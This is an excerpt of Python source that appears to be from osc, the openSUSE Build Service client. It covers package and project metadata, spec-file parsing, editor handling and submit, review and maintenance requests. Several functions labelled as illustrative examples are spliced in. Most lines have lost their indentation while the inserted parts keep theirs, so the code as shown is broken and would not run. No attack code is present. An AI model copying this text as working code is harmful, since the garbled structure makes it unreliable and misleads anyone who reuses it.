def show_package_trigger_reason(apiurl, prj, pac, repo, arch):
url = makeurl(apiurl, ['build', prj, repo, arch, pac, '_reason'])
try:
f = http_GET(url)
return f.read()
except HTTPError as e:
e.osc_msg = 'Error getting trigger reason for project \'%s\' package \'%s\'' % (prj, pac)
raise
def show_package_meta(apiurl, prj, pac, meta=False, blame=None):
query = {}
if meta:
query['meta'] = 1
if blame:
query['view'] = "blame"
query['meta'] = 1
    # The fake package '_project' has no _meta file
if pac.startswith('_project'):
return ""
url = makeurl(apiurl, ['source', prj, pac, '_meta'], query)
try:
f = http_GET(url)
return f.readlines()
except HTTPError as e:
e.osc_msg = 'Error getting meta for project \'%s\' package \'%s\'' % (prj, pac)
raise
def show_attribute_meta(apiurl, prj, pac, subpac, attribute, with_defaults, with_project):
path = []
path.append('source')
path.append(prj)
if pac:
path.append(pac)
if pac and subpac:
path.append(subpac)
path.append('_attribute')
if attribute:
path.append(attribute)
query = []
if with_defaults:
query.append("with_default=1")
if with_project:
query.append("with_project=1")
url = makeurl(apiurl, path, query)
try:
f = http_GET(url)
return f.readlines()
except HTTPError as e:
e.osc_msg = 'Error getting meta for project \'%s\' package \'%s\'' % (prj, pac)
raise
def show_devel_project(apiurl, prj, pac):
m = show_package_meta(apiurl, prj, pac)
node = ET.fromstring(''.join(m)).find('devel')
if node is None:
return None, None
else:
return node.get('project'), node.get('package', None)
def set_devel_project(apiurl, prj, pac, devprj=None, devpac=None):
meta = show_package_meta(apiurl, prj, pac)
root = ET.fromstring(''.join(meta))
node = root.find('devel')
if node is None:
if devprj is None:
return
node = ET.Element('devel')
root.append(node)
else:
if devprj is None:
root.remove(node)
else:
node.clear()
if devprj:
node.set('project', devprj)
if devpac:
node.set('package', devpac)
url = makeurl(apiurl, ['source', prj, pac, '_meta'])
mf = metafile(url, ET.tostring(root, encoding=ET_ENCODING))
mf.sync()
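# Illustrative sketch (not part of osc itself): inspecting and changing the devel
# project of a package with the two helpers above.  All names are placeholders;
# set_devel_project() writes the modified _meta back to the server.
def _example_move_devel_project(apiurl, prj, pac, new_devel_prj):
    """Print the current devel project and point it to new_devel_prj (example only)."""
    devprj, devpac = show_devel_project(apiurl, prj, pac)
    print('current devel project: %s/%s' % (devprj, devpac))
    set_devel_project(apiurl, prj, pac, devprj=new_devel_prj, devpac=pac)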
def show_package_disabled_repos(apiurl, prj, pac):
m = show_package_meta(apiurl, prj, pac)
#FIXME: don't work if all repos of a project are disabled and only some are enabled since <disable/> is empty
try:
root = ET.fromstring(''.join(m))
elm = root.find('build')
r = [ node.get('repository') for node in elm.findall('disable')]
return r
except:
return None
def show_pattern_metalist(apiurl, prj):
url = makeurl(apiurl, ['source', prj, '_pattern'])
try:
f = http_GET(url)
tree = ET.parse(f)
except HTTPError as e:
e.osc_msg = 'show_pattern_metalist: Error getting pattern list for project \'%s\'' % prj
raise
r = sorted([ node.get('name') for node in tree.getroot() ])
return r
def show_pattern_meta(apiurl, prj, pattern):
url = makeurl(apiurl, ['source', prj, '_pattern', pattern])
try:
f = http_GET(url)
return f.readlines()
except HTTPError as e:
e.osc_msg = 'show_pattern_meta: Error getting pattern \'%s\' for project \'%s\'' % (pattern, prj)
raise
def show_configuration(apiurl):
u = makeurl(apiurl, ['public', 'configuration'])
f = http_GET(u)
return f.readlines()
class metafile:
"""metafile that can be manipulated and is stored back after manipulation."""
def __init__(self, url, input, change_is_required=False, file_ext='.xml'):
import tempfile
self.url = url
self.change_is_required = change_is_required
(fd, self.filename) = tempfile.mkstemp(prefix = 'osc_metafile.', suffix = file_ext)
f = os.fdopen(fd, 'w')
f.write(''.join(input))
f.close()
self.hash_orig = dgst(self.filename)
def sync(self):
if self.change_is_required and self.hash_orig == dgst(self.filename):
print('File unchanged. Not saving.')
os.unlink(self.filename)
return
print('Sending meta data...')
# don't do any exception handling... it's up to the caller what to do in case
# of an exception
http_PUT(self.url, file=self.filename)
os.unlink(self.filename)
print('Done.')
def edit(self):
try:
while True:
run_editor(self.filename)
try:
self.sync()
break
except HTTPError as e:
error_help = "%d" % e.code
if e.hdrs.get('X-Opensuse-Errorcode'):
error_help = "%s (%d)" % (e.hdrs.get('X-Opensuse-Errorcode'), e.code)
print('BuildService API error:', error_help, file=sys.stderr)
# examine the error - we can't raise an exception because we might want
# to try again
data = e.read()
if '<summary>' in data:
print(data.split('<summary>')[1].split('</summary>')[0], file=sys.stderr)
ri = raw_input('Try again? ([y/N]): ')
if ri not in ['y', 'Y']:
break
finally:
self.discard()
def discard(self):
if os.path.exists(self.filename):
print('discarding %s' % self.filename)
os.unlink(self.filename)
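# Illustrative sketch (not part of osc itself): pushing hand-crafted XML to the
# server through the metafile helper above.  The URL components and xml_body are
# placeholders; sync() issues an HTTP PUT and removes the temporary file again.
def _example_put_package_meta(apiurl, prj, pac, xml_body):
    """Upload xml_body as the package _meta (example only)."""
    url = makeurl(apiurl, ['source', prj, pac, '_meta'])
    mf = metafile(url, xml_body)
    mf.sync()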
# different types of metadata
metatypes = { 'prj': { 'path': 'source/%s/_meta',
'template': new_project_templ,
'file_ext': '.xml'
},
'pkg': { 'path' : 'source/%s/%s/_meta',
'template': new_package_templ,
'file_ext': '.xml'
},
'attribute': { 'path' : 'source/%s/%s/_meta',
'template': new_attribute_templ,
'file_ext': '.xml'
},
'prjconf': { 'path': 'source/%s/_config',
'template': '',
'file_ext': '.txt'
},
'user': { 'path': 'person/%s',
'template': new_user_template,
'file_ext': '.xml'
},
'group': { 'path': 'group/%s',
'template': new_group_template,
'file_ext': '.xml'
},
'pattern': { 'path': 'source/%s/_pattern/%s',
'template': new_pattern_template,
'file_ext': '.xml'
},
}
def meta_exists(metatype,
path_args=None,
template_args=None,
create_new=True,
apiurl=None):
global metatypes
if not apiurl:
apiurl = conf.config['apiurl']
url = make_meta_url(metatype, path_args, apiurl)
try:
data = http_GET(url).readlines()
except HTTPError as e:
if e.code == 404 and create_new:
data = metatypes[metatype]['template']
if template_args:
data = StringIO(data % template_args).readlines()
else:
raise e
return data
def make_meta_url(metatype, path_args=None, apiurl=None, force=False, remove_linking_repositories=False, msg=None):
global metatypes
if not apiurl:
apiurl = conf.config['apiurl']
if metatype not in metatypes.keys():
raise AttributeError('make_meta_url(): Unknown meta type \'%s\'' % metatype)
path = metatypes[metatype]['path']
if path_args:
path = path % path_args
query = {}
if force:
query = { 'force': '1' }
if remove_linking_repositories:
query['remove_linking_repositories'] = '1'
if msg:
query['comment'] = msg
return makeurl(apiurl, [path], query)
def edit_meta(metatype,
path_args=None,
data=None,
template_args=None,
edit=False,
force=False,
remove_linking_repositories=False,
change_is_required=False,
apiurl=None,
msg=None):
global metatypes
if not apiurl:
apiurl = conf.config['apiurl']
if not data:
data = meta_exists(metatype,
path_args,
template_args,
create_new = metatype != 'prjconf', # prjconf always exists, 404 => unknown prj
apiurl=apiurl)
if edit:
change_is_required = True
if metatype == 'pkg':
# check if the package is a link to a different project
project, package = path_args
orgprj = ET.fromstring(''.join(data)).get('project')
if orgprj is not None and unquote(project) != orgprj:
print('The package is linked from a different project.')
print('If you want to edit the meta of the package create first a branch.')
print(' osc branch %s %s %s' % (orgprj, package, unquote(project)))
print(' osc meta pkg %s %s -e' % (unquote(project), package))
return
url = make_meta_url(metatype, path_args, apiurl, force, remove_linking_repositories, msg)
f = metafile(url, data, change_is_required, metatypes[metatype]['file_ext'])
if edit:
f.edit()
else:
f.sync()
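# Illustrative sketch (not part of osc itself): combining show_package_meta() and
# edit_meta().  Passing data= skips the template handling in meta_exists(); the
# project and package names are placeholders.
def _example_resubmit_package_meta(apiurl, prj, pac):
    """Fetch the package _meta and push it back unchanged (example only)."""
    data = show_package_meta(apiurl, prj, pac)
    edit_meta('pkg', path_args=(quote_plus(prj), quote_plus(pac)),
              data=data, apiurl=apiurl)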
def show_files_meta(apiurl, prj, pac, revision=None, expand=False, linkrev=None, linkrepair=False, meta=False, deleted=False):
query = {}
if revision:
query['rev'] = revision
else:
query['rev'] = 'latest'
if linkrev:
query['linkrev'] = linkrev
elif conf.config['linkcontrol']:
query['linkrev'] = 'base'
if meta:
query['meta'] = 1
if deleted:
query['deleted'] = 1
if expand:
query['expand'] = 1
if linkrepair:
query['emptylink'] = 1
f = http_GET(makeurl(apiurl, ['source', prj, pac], query=query))
return f.read()
def show_upstream_srcmd5(apiurl, prj, pac, expand=False, revision=None, meta=False, include_service_files=False, deleted=False):
m = show_files_meta(apiurl, prj, pac, expand=expand, revision=revision, meta=meta, deleted=deleted)
et = ET.fromstring(''.join(m))
if include_service_files:
try:
sinfo = et.find('serviceinfo')
            if sinfo is not None and sinfo.get('xsrcmd5') and not sinfo.get('error'):
return sinfo.get('xsrcmd5')
except:
pass
return et.get('srcmd5')
def show_upstream_xsrcmd5(apiurl, prj, pac, revision=None, linkrev=None, linkrepair=False, meta=False, include_service_files=False):
m = show_files_meta(apiurl, prj, pac, revision=revision, linkrev=linkrev, linkrepair=linkrepair, meta=meta, expand=include_service_files)
et = ET.fromstring(''.join(m))
if include_service_files:
return et.get('srcmd5')
li_node = et.find('linkinfo')
if li_node is None:
return None
li = Linkinfo()
li.read(li_node)
if li.haserror():
raise oscerr.LinkExpandError(prj, pac, li.error)
return li.xsrcmd5
def show_project_sourceinfo(apiurl, project, nofilename, *packages):
query = ['view=info']
if packages:
query.extend(['package=%s' % quote_plus(p) for p in packages])
if nofilename:
query.append('nofilename=1')
f = http_GET(makeurl(apiurl, ['source', project], query=query))
return f.read()
def get_project_sourceinfo(apiurl, project, nofilename, *packages):
try:
si = show_project_sourceinfo(apiurl, project, nofilename, *packages)
except HTTPError as e:
# old API servers (e.g. 2.3.5) do not know the 'nofilename' parameter, so retry without
if e.code == 400 and nofilename:
return get_project_sourceinfo(apiurl, project, False, *packages)
        # a URI-too-long error is sometimes handled as status 500
        # (depending, e.g., on the apache2 configuration)
if e.code not in (414, 500):
raise
if len(packages) == 1:
raise oscerr.APIError('package name too long: %s' % packages[0])
        n = len(packages) // 2  # integer division: packages[:n] needs an int index
pkgs = packages[:n]
res = get_project_sourceinfo(apiurl, project, nofilename, *pkgs)
pkgs = packages[n:]
res.update(get_project_sourceinfo(apiurl, project, nofilename, *pkgs))
return res
root = ET.fromstring(si)
res = {}
for sinfo in root.findall('sourceinfo'):
res[sinfo.get('package')] = sinfo
return res
def show_upstream_rev_vrev(apiurl, prj, pac, revision=None, expand=False, meta=False):
m = show_files_meta(apiurl, prj, pac, revision=revision, expand=expand, meta=meta)
et = ET.fromstring(''.join(m))
return et.get('rev'), et.get('vrev')
def show_upstream_rev(apiurl, prj, pac, revision=None, expand=False, linkrev=None, meta=False, include_service_files=False):
m = show_files_meta(apiurl, prj, pac, revision=revision, expand=expand, linkrev=linkrev, meta=meta)
et = ET.fromstring(''.join(m))
if include_service_files:
try:
sinfo = et.find('serviceinfo')
if sinfo != None and sinfo.get('xsrcmd5') and not sinfo.get('error'):
return sinfo.get('xsrcmd5')
except:
pass
return et.get('rev')
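# Illustrative sketch (not part of osc itself): querying revision information of a
# package with the helpers above.  Project and package names are placeholders.
def _example_print_revision_info(apiurl, prj, pac):
    """Print rev, vrev and srcmd5 of the latest upload (example only)."""
    rev, vrev = show_upstream_rev_vrev(apiurl, prj, pac)
    srcmd5 = show_upstream_srcmd5(apiurl, prj, pac)
    print('rev=%s vrev=%s srcmd5=%s' % (rev, vrev, srcmd5))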
def read_meta_from_spec(specfile, *args):
    """
    Read tags and sections from a spec file. To read a tag, the passed
    argument must not end with a colon. To read a section, the passed
    argument must start with a '%'.
    This method returns a dictionary which contains the requested data.
    """
    import codecs, re
if not os.path.isfile(specfile):
raise oscerr.OscIOError(None, '\'%s\' is not a regular file' % specfile)
try:
lines = codecs.open(specfile, 'r', locale.getpreferredencoding()).readlines()
except UnicodeDecodeError:
lines = open(specfile).readlines()
tags = []
sections = []
spec_data = {}
for itm in args:
if itm.startswith('%'):
sections.append(itm)
else:
tags.append(itm)
    tag_pat = r'(?P<tag>^%s)\s*:\s*(?P<val>.*)'
for tag in tags:
m = re.compile(tag_pat % tag, re.I | re.M).search(''.join(lines))
if m and m.group('val'):
spec_data[tag] = m.group('val').strip()
    section_pat = r'^%s\s*?$'
for section in sections:
m = re.compile(section_pat % section, re.I | re.M).search(''.join(lines))
if m:
start = lines.index(m.group()+'\n') + 1
data = []
for line in lines[start:]:
if line.startswith('%'):
break
data.append(line)
spec_data[section] = data
return spec_data
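# Illustrative sketch (not part of osc itself): extracting a few tags and one
# section from a local spec file with read_meta_from_spec().  The path is a
# placeholder.
def _example_read_spec(specfile='/tmp/example.spec'):
    """Return (name, version, description lines) from a spec file (example only)."""
    data = read_meta_from_spec(specfile, 'Name', 'Version', '%description')
    return data.get('Name'), data.get('Version'), data.get('%description', [])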
def get_default_editor():
import platform
system = platform.system()
if system == 'Windows':
return 'notepad'
if system == 'Linux':
try:
# Python 2.6
dist = platform.linux_distribution()[0]
except AttributeError:
dist = platform.dist()[0]
if dist == 'debian':
return 'editor'
elif dist == 'fedora':
return 'vi'
return 'vim'
return 'vi'
def get_default_pager():
import platform
system = platform.system()
if system == 'Windows':
return 'less'
if system == 'Linux':
try:
# Python 2.6
dist = platform.linux_distribution()[0]
except AttributeError:
dist = platform.dist()[0]
if dist == 'debian':
return 'pager'
return 'less'
return 'more'
def run_pager(message, tmp_suffix=''):
import tempfile, sys
if not message:
return
if not sys.stdout.isatty():
print(message)
else:
tmpfile = tempfile.NamedTemporaryFile(suffix=tmp_suffix)
tmpfile.write(message)
tmpfile.flush()
pager = os.getenv('PAGER', default=get_default_pager())
cmd = shlex.split(pager) + [tmpfile.name]
try:
run_external(*cmd)
finally:
tmpfile.close()
def run_editor(filename):
cmd = _editor_command()
cmd.append(filename)
return run_external(cmd[0], *cmd[1:])
def _editor_command():
editor = os.getenv('EDITOR', default=get_default_editor())
try:
cmd = shlex.split(editor)
except SyntaxError:
cmd = editor.split()
return cmd
def _edit_message_open_editor(filename, data, orig_mtime):
# FIXME: import modules globally
import tempfile
editor = _editor_command()
mtime = os.stat(filename).st_mtime
if mtime == orig_mtime:
# prepare file for editors
if editor[0] in ('vi', 'vim'):
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
editor.extend(['-c', ':r %s' % f.name, filename])
run_external(editor[0], *editor[1:])
else:
with open(filename, 'w') as f:
f.write(data)
orig_mtime = os.stat(filename).st_mtime
run_editor(filename)
else:
run_editor(filename)
return os.stat(filename).st_mtime != orig_mtime
def edit_message(footer='', template='', templatelen=30):
delim = '--This line, and those below, will be ignored--\n'
data = ''
if template != '':
if not templatelen is None:
lines = template.splitlines()
data = '\n'.join(lines[:templatelen])
if lines[templatelen:]:
footer = '%s\n\n%s' % ('\n'.join(lines[templatelen:]), footer)
data += '\n' + delim + '\n' + footer
return edit_text(data, delim, suffix='.diff', template=template)
def edit_text(data='', delim=None, suffix='.txt', template=''):
import tempfile
try:
(fd, filename) = tempfile.mkstemp(prefix='osc-editor', suffix=suffix)
os.close(fd)
mtime = os.stat(filename).st_mtime
ri_err = False
while True:
if not ri_err:
file_changed = _edit_message_open_editor(filename, data, mtime)
msg = open(filename).read()
if delim:
msg = msg.split(delim)[0].rstrip()
if msg and file_changed:
break
else:
reason = 'Log message not specified'
if template == msg:
reason = 'Default log message was not changed. Press \'c\' to continue.'
ri = raw_input('%s\na)bort, c)ontinue, e)dit: ' % reason)
if ri in 'aA':
raise oscerr.UserAbort()
elif ri in 'cC':
break
elif ri in 'eE':
ri_err = False
else:
print("%s is not a valid option." % ri)
ri_err = True
finally:
os.unlink(filename)
return msg
def clone_request(apiurl, reqid, msg=None):
query = {'cmd': 'branch', 'request': reqid}
url = makeurl(apiurl, ['source'], query)
r = http_POST(url, data=msg)
root = ET.fromstring(r.read())
project = None
for i in root.findall('data'):
if i.get('name') == 'targetproject':
project = i.text.strip()
if not project:
raise oscerr.APIError('invalid data from clone request:\n%s\n' % ET.tostring(root, encoding=ET_ENCODING))
return project
# create a maintenance release request
def create_release_request(apiurl, src_project, message=''):
import cgi
r = Request()
# api will complete the request
r.add_action('maintenance_release', src_project=src_project)
# XXX: clarify why we need the unicode(...) stuff
r.description = cgi.escape(unicode(message, 'utf8'))
r.create(apiurl)
return r
# create a maintenance incident per request
def create_maintenance_request(apiurl, src_project, src_packages, tgt_project, tgt_releaseproject, opt_sourceupdate, message=''):
import cgi
r = Request()
if src_packages:
for p in src_packages:
r.add_action('maintenance_incident', src_project=src_project, src_package=p, tgt_project=tgt_project, tgt_releaseproject=tgt_releaseproject, opt_sourceupdate = opt_sourceupdate)
else:
r.add_action('maintenance_incident', src_project=src_project, tgt_project=tgt_project, tgt_releaseproject=tgt_releaseproject, opt_sourceupdate = opt_sourceupdate)
# XXX: clarify why we need the unicode(...) stuff
r.description = cgi.escape(unicode(message, 'utf8'))
r.create(apiurl, addrevision=True)
return r
def create_submit_request(apiurl,
src_project, src_package=None,
dst_project=None, dst_package=None,
message="", orev=None, src_update=None, dst_updatelink=None):
import cgi
options_block = ""
package = ""
if src_package:
package = """package="%s" """ % (src_package)
options_block = "<options>"
if src_update:
options_block += """<sourceupdate>%s</sourceupdate>""" % (src_update)
if dst_updatelink:
options_block += """<updatelink>true</updatelink>"""
options_block += "</options>"
# Yes, this kind of xml construction is horrible
targetxml = ""
if dst_project:
packagexml = ""
if dst_package:
packagexml = """package="%s" """ % ( dst_package )
targetxml = """<target project="%s" %s /> """ % ( dst_project, packagexml )
# XXX: keep the old template for now in order to work with old obs instances
xml = """\
<request>
<action type="submit">
<source project="%s" %s rev="%s"/>
%s
%s
</action>
<state name="new"/>
<description>%s</description>
</request>
""" % (src_project,
package,
orev or show_upstream_rev(apiurl, src_project, src_package),
targetxml,
options_block,
cgi.escape(message))
    # Don't do cgi.escape(unicode(message, "utf8")) above.
    # Promoting the string to utf8 causes the POST to explode with:
    # uncaught exception: Fatal error: Start tag expected, '<' not found at :1.
    # I guess my original workaround was not that bad.
u = makeurl(apiurl, ['request'], query='cmd=create')
r = None
try:
f = http_POST(u, data=xml)
root = ET.parse(f).getroot()
r = root.get('id')
except HTTPError as e:
if e.hdrs.get('X-Opensuse-Errorcode') == "submit_request_rejected":
print("WARNING:")
print("WARNING: Project does not accept submit request, request to open a NEW maintenance incident instead")
print("WARNING:")
xpath = 'maintenance/maintains/@project = \'%s\' and attribute/@name = \'%s\'' % (dst_project, conf.config['maintenance_attribute'])
res = search(apiurl, project_id=xpath)
root = res['project_id']
project = root.find('project')
if project is None:
print("WARNING: This project is not maintained in the maintenance project specified by '%s', looking elsewhere" % conf.config['maintenance_attribute'])
xpath = 'maintenance/maintains/@project = \'%s\'' % dst_project
res = search(apiurl, project_id=xpath)
root = res['project_id']
project = root.find('project')
if project is None:
raise oscerr.APIError("Server did not define a default maintenance project, can't submit.")
tproject = project.get('name')
r = create_maintenance_request(apiurl, src_project, [src_package], tproject, dst_project, src_update, message)
r = r.reqid
else:
raise
return r
def get_request(apiurl, reqid):
u = makeurl(apiurl, ['request', reqid], {'withfullhistory': '1'})
f = http_GET(u)
root = ET.parse(f).getroot()
r = Request()
r.read(root)
return r
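# Illustrative sketch (not part of osc itself): fetching a single request and
# printing its state history with get_request() and get_request_log().  The
# request id is a placeholder.
def _example_show_request(apiurl, reqid='12345'):
    """Print the current state and the log of a request (example only)."""
    r = get_request(apiurl, reqid)
    print('request %s is in state %s' % (r.reqid, r.state.name))
    for entry in get_request_log(apiurl, reqid):
        print(entry)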
def change_review_state(apiurl, reqid, newstate, by_user='', by_group='', by_project='', by_package='', message='', supersed=None):
query = {'cmd': 'changereviewstate', 'newstate': newstate }
if by_user:
query['by_user'] = by_user
if by_group:
query['by_group'] = by_group
if by_project:
query['by_project'] = by_project
if by_package:
query['by_package'] = by_package
if supersed:
query['superseded_by'] = supersed
u = makeurl(apiurl, ['request', reqid], query=query)
f = http_POST(u, data=message)
root = ET.parse(f).getroot()
return root.get('code')
def change_request_state(apiurl, reqid, newstate, message='', supersed=None, force=False):
query = {'cmd': 'changestate', 'newstate': newstate }
if supersed:
query['superseded_by'] = supersed
if force:
query['force'] = "1"
u = makeurl(apiurl,
['request', reqid], query=query)
f = http_POST(u, data=message)
root = ET.parse(f).getroot()
return root.get('code', 'unknown')
def change_request_state_template(req, newstate):
if not len(req.actions):
return ''
action = req.actions[0]
tmpl_name = '%srequest_%s_template' % (action.type, newstate)
tmpl = conf.config.get(tmpl_name, '')
tmpl = tmpl.replace('\\t', '\t').replace('\\n', '\n')
data = {'reqid': req.reqid, 'type': action.type, 'who': req.creator}
if req.actions[0].type == 'submit':
data.update({'src_project': action.src_project,
'src_package': action.src_package, 'src_rev': action.src_rev,
'dst_project': action.tgt_project, 'dst_package': action.tgt_package,
'tgt_project': action.tgt_project, 'tgt_package': action.tgt_package})
try:
return tmpl % data
except KeyError as e:
print('error: cannot interpolate \'%s\' in \'%s\'' % (e.args[0], tmpl_name), file=sys.stderr)
return ''
def get_review_list(apiurl, project='', package='', byuser='', bygroup='', byproject='', bypackage='', states=(),
req_type=''):
# this is so ugly...
def build_by(xpath, val):
if 'all' in states:
return xpath_join(xpath, 'review/%s' % val, op='and')
elif states:
s_xp = ''
for state in states:
s_xp = xpath_join(s_xp, '@state=\'%s\'' % state, inner=True)
val = val.strip('[').strip(']')
return xpath_join(xpath, 'review[%s and (%s)]' % (val, s_xp), op='and')
else:
# default case
return xpath_join(xpath, 'review[%s and @state=\'new\']' % val, op='and')
return ''
xpath = ''
if states == ():
# default: requests which are still open and have reviews in "new" state
xpath = xpath_join('', 'state/@name=\'review\'', op='and')
xpath = xpath_join(xpath, 'review/@state=\'new\'', op='and')
if byuser:
xpath = build_by(xpath, '@by_user=\'%s\'' % byuser)
if bygroup:
xpath = build_by(xpath, '@by_group=\'%s\'' % bygroup)
if bypackage:
xpath = build_by(xpath, '@by_project=\'%s\' and @by_package=\'%s\'' % (byproject, bypackage))
elif byproject:
xpath = build_by(xpath, '@by_project=\'%s\'' % byproject)
if req_type:
xpath = xpath_join(xpath, 'action/@type=\'%s\'' % req_type, op='and')
# XXX: we cannot use the '|' in the xpath expression because it is not supported
# in the backend
todo = {}
if project:
todo['project'] = project
if package:
todo['package'] = package
for kind, val in todo.items():
xpath_base = 'action/target/@%(kind)s=\'%(val)s\' or ' \
'submit/target/@%(kind)s=\'%(val)s\''
if conf.config['include_request_from_project']:
xpath_base = xpath_join(xpath_base, 'action/source/@%(kind)s=\'%(val)s\' or ' \
'submit/source/@%(kind)s=\'%(val)s\'', op='or', inner=True)
xpath = xpath_join(xpath, xpath_base % {'kind': kind, 'val': val}, op='and', nexpr_parentheses=True)
if conf.config['verbose'] > 1:
print('[ %s ]' % xpath)
res = search(apiurl, request=xpath)
collection = res['request']
requests = []
for root in collection.findall('request'):
r = Request()
r.read(root)
requests.append(r)
return requests
# this function uses the logic in the api, which is faster and more exact than the xpath search
def get_request_collection(apiurl, role=None, req_who=None, req_states=('new', 'review', 'declined')):
query={ "view" : "collection" }
if role:
query["roles"] = role
if req_who:
query["user"] = req_who
query["states"] = ",".join(req_states)
u = makeurl(apiurl, ['request'], query)
f = http_GET(u)
res = ET.parse(f).getroot()
requests = []
for root in res.findall('request'):
r = Request()
r.read(root)
requests.append(r)
return requests
def get_exact_request_list(apiurl, src_project, dst_project, src_package=None, dst_package=None, req_who=None, req_state=('new', 'review', 'declined'), req_type=None):
xpath = ''
if not 'all' in req_state:
for state in req_state:
xpath = xpath_join(xpath, 'state/@name=\'%s\'' % state, op='or', inner=True)
xpath = '(%s)' % xpath
if req_who:
xpath = xpath_join(xpath, '(state/@who=\'%(who)s\' or history/@who=\'%(who)s\')' % {'who': req_who}, op='and')
xpath += " and action[source/@project='%s'" % src_project
if src_package:
xpath += " and source/@package='%s'" % src_package
xpath += " and target/@project='%s'" % dst_project
if dst_package:
xpath += " and target/@package='%s'" % dst_package
xpath += "]"
if req_type:
xpath += " and action/@type=\'%s\'" % req_type
if conf.config['verbose'] > 1:
print('[ %s ]' % xpath)
res = search(apiurl, request=xpath)
collection = res['request']
requests = []
for root in collection.findall('request'):
r = Request()
r.read(root)
requests.append(r)
return requests
def get_request_list(apiurl, project='', package='', req_who='', req_state=('new', 'review', 'declined'), req_type=None, exclude_target_projects=[],
withfullhistory=False):
xpath = ''
if not 'all' in req_state:
for state in req_state:
xpath = xpath_join(xpath, 'state/@name=\'%s\'' % state, inner=True)
if req_who:
xpath = xpath_join(xpath, '(state/@who=\'%(who)s\' or history/@who=\'%(who)s\')' % {'who': req_who}, op='and')
# XXX: we cannot use the '|' in the xpath expression because it is not supported
# in the backend
todo = {}
if project:
todo['project'] = project
if package:
todo['package'] = package
for kind, val in todo.items():
xpath_base = 'action/target/@%(kind)s=\'%(val)s\' or ' \
'submit/target/@%(kind)s=\'%(val)s\''
if conf.config['include_request_from_project']:
xpath_base = xpath_join(xpath_base, 'action/source/@%(kind)s=\'%(val)s\' or ' \
'submit/source/@%(kind)s=\'%(val)s\'', op='or', inner=True)
xpath = xpath_join(xpath, xpath_base % {'kind': kind, 'val': val}, op='and', nexpr_parentheses=True)
if req_type:
xpath = xpath_join(xpath, 'action/@type=\'%s\'' % req_type, op='and')
for i in exclude_target_projects:
xpath = xpath_join(xpath, '(not(action/target/@project=\'%(prj)s\' or ' \
'submit/target/@project=\'%(prj)s\'))' % {'prj': i}, op='and')
if conf.config['verbose'] > 1:
print('[ %s ]' % xpath)
queries = {}
if withfullhistory:
queries['request'] = {'withfullhistory': '1'}
res = search(apiurl, queries=queries, request=xpath)
collection = res['request']
requests = []
for root in collection.findall('request'):
r = Request()
r.read(root)
requests.append(r)
return requests
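# Illustrative sketch (not part of osc itself): listing open submit requests that
# target a given project via get_request_list().  The project name and the chosen
# states are placeholders.
def _example_list_open_submit_requests(apiurl, prj):
    """Print id and state of open submit requests targeting prj (example only)."""
    for r in get_request_list(apiurl, project=prj, req_state=('new', 'review'),
                              req_type='submit'):
        print('%s %s' % (r.reqid, r.state.name))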
# old style search, this is to be removed
def get_user_projpkgs_request_list(apiurl, user, req_state=('new', 'review', ), req_type=None, exclude_projects=[], projpkgs={}):
"""OBSOLETE: user involved request search is supported by OBS 2.2 server side in a better way
Return all running requests for all projects/packages where is user is involved"""
if not projpkgs:
res = get_user_projpkgs(apiurl, user, exclude_projects=exclude_projects)
projects = []
for i in res['project_id'].findall('project'):
projpkgs[i.get('name')] = []
projects.append(i.get('name'))
for i in res['package_id'].findall('package'):
if not i.get('project') in projects:
projpkgs.setdefault(i.get('project'), []).append(i.get('name'))
if not projpkgs:
return []
xpath = ''
for prj, pacs in projpkgs.items():
if not len(pacs):
xpath = xpath_join(xpath, 'action/target/@project=\'%s\'' % prj, inner=True)
else:
xp = ''
for p in pacs:
xp = xpath_join(xp, 'action/target/@package=\'%s\'' % p, inner=True)
xp = xpath_join(xp, 'action/target/@project=\'%s\'' % prj, op='and')
xpath = xpath_join(xpath, xp, inner=True)
if req_type:
xpath = xpath_join(xpath, 'action/@type=\'%s\'' % req_type, op='and')
if not 'all' in req_state:
xp = ''
for state in req_state:
xp = xpath_join(xp, 'state/@name=\'%s\'' % state, inner=True)
xpath = xpath_join(xp, xpath, op='and', nexpr_parentheses=True)
res = search(apiurl, request=xpath)
result = []
for root in res['request'].findall('request'):
r = Request()
r.read(root)
result.append(r)
return result
def get_request_log(apiurl, reqid):
r = get_request(apiurl, reqid)
data = []
frmt = '-' * 76 + '\n%s | %s | %s\n\n%s'
r.statehistory.reverse()
# the description of the request is used for the initial log entry
# otherwise its comment attribute would contain None
if len(r.statehistory) >= 1:
r.statehistory[-1].comment = r.description
else:
r.state.comment = r.description
for state in [ r.state ] + r.statehistory:
s = frmt % (state.name, state.who, state.when, str(state.comment))
data.append(s)
return data
def check_existing_requests(apiurl, src_project, src_package, dst_project,
dst_package):
reqs = get_exact_request_list(apiurl, src_project, dst_project,
src_package, dst_package,
req_type='submit',
req_state=['new', 'review', 'declined'])
repl = ''
if reqs:
        print('The following submit requests already exist: %s.' % \
              ', '.join([i.reqid for i in reqs]))
repl = raw_input('Supersede the old requests? (y/n/c) ')
while repl.lower() not in ['c', 'y', 'n']:
print('%s is not a valid option.' % repl)
repl = raw_input('Supersede the old requests? (y/n/c) ')
if repl.lower() == 'c':
print('Aborting', file=sys.stderr)
raise oscerr.UserAbort()
return repl == 'y', reqs
def check_existing_maintenance_requests(apiurl, src_project, src_packages, dst_project,
release_project):
reqs = []
for src_package in src_packages:
reqs += get_exact_request_list(apiurl, src_project, dst_project,
src_package, None,
req_type='maintenance_incident',
req_state=['new', 'review', 'declined'])
repl = ''
if reqs:
        print('The following maintenance incident requests already exist: %s.' % \
              ', '.join([i.reqid for i in reqs]))
repl = raw_input('Supersede the old requests? (y/n/c) ')
while repl.lower() not in ['c', 'y', 'n']:
print('%s is not a valid option.' % repl)
repl = raw_input('Supersede the old requests? (y/n/c) ')
if repl.lower() == 'c':
print('Aborting', file=sys.stderr)
raise oscerr.UserAbort()
return repl == 'y', reqs
# old function kept for compat reasons. Some plugins may call this function
# and we do not want to break them.
def get_group(apiurl, group):
return get_group_meta(apiurl, group)
def get_group_meta(apiurl, group):
u = makeurl(apiurl, ['group', quote_plus(group)])
try:
f = http_GET(u)
return ''.join(f.readlines())
except HTTPError:
print('group \'%s\' not found' % group)
return None
def get_user_meta(apiurl, user):
u = makeurl(apiurl, ['person', quote_plus(user)])
try:
f = http_GET(u)
return ''.join(f.readlines())
except HTTPError:
print('user \'%s\' not found' % user)
return None
def _get_xml_data(meta, *tags):
data = []
    if meta is not None:
root = ET.fromstring(meta)
for tag in tags:
elm = root.find(tag)
if elm is None or elm.text is None:
data.append('-')
else:
data.append(elm.text)
return data
def get_user_data(apiurl, user, *tags):
"""get specified tags from the user meta"""
